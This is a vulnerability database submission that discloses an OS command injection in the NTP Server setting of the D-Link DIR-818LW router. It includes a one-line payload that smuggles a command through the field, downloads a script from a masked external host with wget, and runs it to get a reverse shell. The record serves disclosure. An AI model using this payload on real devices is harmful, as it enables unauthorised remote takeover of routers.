| Title | D-LINK DIR-818LW HW:B1 OS Command Injection |
|---|---|
| Description | In the D-Link router model DIR-818LW, there is a Remote Code Execution (RCE) vulnerability located in the "Management > System Time" submenu, specifically in the "NTP Server" parameter. This field is intended to configure the server from which the router retrieves time synchronization data. However, it is possible to inject a malicious payload into this field, allowing the execution of arbitrary commands and ultimately achieving a reverse shell in Bash. script: `eixicgrg; (test -e /tmp/n.sh \|\| wget http://xxx.xxx.xxx.xxx:xxxx/n.sh -O /tmp/n.sh; chmod 777 /tmp/n.sh; /tmp/n.sh &);` |
| Source | ⚠️ http://x.x.x.x/info/Login.html |
| User | Havook (UID 71104) |
| Submission | 2025-07-12 10:18 AM (11 months ago) |
| Moderation | 2025-07-12 08:44 PM (10 hours later) |
| Status | Accepted |
| VulDB Entry | 316251 [D-Link DIR-818LW up to 20191215 System Time Page NTP Server privilege escalation] |
| Points | 20 |